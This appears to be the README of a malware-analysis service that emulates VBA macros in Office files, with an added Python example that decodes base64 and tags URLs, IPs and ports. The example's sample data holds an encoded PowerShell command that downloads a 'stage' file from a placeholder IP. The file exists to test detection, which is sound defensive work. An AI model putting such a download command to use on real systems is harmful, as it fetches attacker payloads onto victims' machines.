This service analyzes and emulates VBA macros contained in Microsoft Office files.
This service uses Decalage's ViperMonkey (https://github.com/decalage2/ViperMonkey) for analysis/emulation. ViperMonkey will report the following:
- All discovered actions including entry points. Able to decode base64 encoded commands.
- Any VBA built-in functions used.
- Detected URLs, URIs, and IP addresses.
- Tags:
  - network.static.domain
  - network.static.ip
  - network.static.uri
  - network.port
  - technique.macro
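
To illustrate the base64 decoding and URL/IP reporting listed above, the following Python is an added example, not code from this service or from ViperMonkey. The function names, regular expressions and the sample action text are assumptions made for the illustration, and only the four network tags are covered.

```python
import base64, binascii, ipaddress, re
from urllib.parse import urlsplit

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)

def decode_candidates(text):
    """Yield readable decodings of base64 runs found in an emulated action's text."""
    for match in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            # PowerShell -EncodedCommand carries UTF-16LE, so NUL bytes hint at that encoding.
            decoded = raw.decode("utf-16-le" if b"\x00" in raw else "utf-8")
        except (binascii.Error, ValueError):  # bad padding, or bytes that are not text
            continue
        if decoded and all(c.isprintable() or c in "\r\n\t" for c in decoded):
            yield decoded

def tag_iocs(action_text):
    """Group URLs found in the raw and base64-decoded text under the network tags."""
    tags = {"network.static.uri": set(), "network.static.domain": set(),
            "network.static.ip": set(), "network.port": set()}
    for text in [action_text, *decode_candidates(action_text)]:
        for url in URL_RE.findall(text):
            try:
                parts = urlsplit(url)
                host, port = parts.hostname, parts.port
            except ValueError:  # malformed port or IPv6 literal
                continue
            if not host:
                continue
            tags["network.static.uri"].add(url)
            try:
                ipaddress.ip_address(host)
                tags["network.static.ip"].add(host)
            except ValueError:  # not an IP literal, so treat it as a domain
                tags["network.static.domain"].add(host)
            if port:
                tags["network.port"].add(port)
    return {name: sorted(values) for name, values in tags.items() if values}

# Constructed sample: text of two emulated actions, one carrying its URL in base64.
INNER = "Invoke-WebRequest http://203.0.113.7:8080/stage.txt"
SAMPLE = ("Shell: powershell -enc "
          + base64.b64encode(INNER.encode("utf-16-le")).decode()
          + " | Open: http://updates.example.test/check")

if __name__ == "__main__":
    for name, values in tag_iocs(SAMPLE).items():
        print(name, values)
```

The IP address and port in the sample only surface after the base64 run is decoded, which is why decoding happens before indicator extraction.
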
ViperMonkey may use eval() to speed up emulation. This service should be run in a sandboxed environment, which Assemblyline does by default for non-privileged services. This service should not be run in privileged mode.